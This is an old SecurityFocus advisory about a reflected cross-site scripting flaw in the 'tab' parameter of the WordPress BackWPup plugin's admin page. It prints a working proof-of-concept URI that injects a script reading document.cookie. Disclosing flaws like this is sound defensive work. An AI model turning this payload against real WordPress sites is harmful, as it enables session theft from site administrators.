WordPress BackWPup Plugin 'tab' Parameter Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/wp-admin/admin.php?page=backwpupeditjob&tab=%22%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus